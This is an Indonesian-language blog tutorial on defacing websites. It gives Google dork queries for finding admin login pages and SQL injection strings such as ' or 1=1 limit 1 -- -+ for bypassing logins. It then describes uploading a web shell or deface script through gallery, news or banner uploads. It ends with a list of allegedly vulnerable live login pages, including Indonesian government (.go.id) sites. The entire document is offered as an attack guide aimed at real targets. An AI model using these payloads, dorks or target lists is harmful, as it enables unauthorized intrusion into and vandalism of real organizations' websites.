Tutorial Deface Metode Bypass SQL Login

Assalamualaikum,Oke Guys Kali Ini Saya MR.3L3PH4NT Akan Ngasih Tutorial Deface POC Bypass SQL Login
     
     DEFACE POC BYPASS SQL LOGIN
Bahan/Alat
1.Dork
2.Hp
3.Script Deface
4.Internet
5.Browser
6.Kesabaran Sangat Diutamakan Pada Deface Yg Satu Ini :v Uwuuu

Step by step
1.Dorking di google
Dork:- inurl:/admin/login.php site:
- inurl:/admin/images intext:"ParentDirectory"
- intitle:"login.php" inurl:/admin
- inurl:admin/index.php House inurl:/login.php site: indonesia
- inurl:webadmin/index.php ext:php site:org.in(Selebihnya
kembangkan Sndrii Jangan Manja:v)
Note Site Bisa Kalian Ubah Sendiri Sesuai Kemauan

2.Nah Setelah Kalian Dorking Isi Username Dan Password Dengan
- '=''or' Atau
- ' or 1=1 limit 1 -- -+
- Misalkan LoginNya Memakai Email Maka Masukan Email admin@gmail.com password ' or 1=1 limit 1 -- -+
Note Tidak Semua Web Bsa Memakai Email Tersebut

3. Kalo Dah Pilih Salah Satu WebNya Kalo Vuln Maka ada Kalian Akan Di
Suguhkan Dengan Bidadari Cakep:v Maksudnya Di Halaman Dasboard Admin

4.Kalo Sudah Masuk Tinggal Cari Tempat Buat Upload BiasaNya Di
gallery,News,Banner Dll

5.Kalo Kaga Bisa Upload Script/Shell Kalean,Kita Menggunakan Teknik Dengan Cara Men JSO,News,Banner Sesuka Kalian Lah Mau Naroh Script JSO Kalian Dmna

Oke Ini Ada Tambahan Web Vuln Ya Buat Kalian Semua :)
-http://visiongsistema.com/admin/login.php
-https://epen.papua.go.id/epen/login/login.php
-http://sipintarsolo.surakarta.go.id/login.php
-http://e-monev.lombokutarakab.go.id/login.php
-http://sikaryawanptsjp.co.id/pages/login.php

Oke,Cukup Sekian Tutor Nya :")

Share this post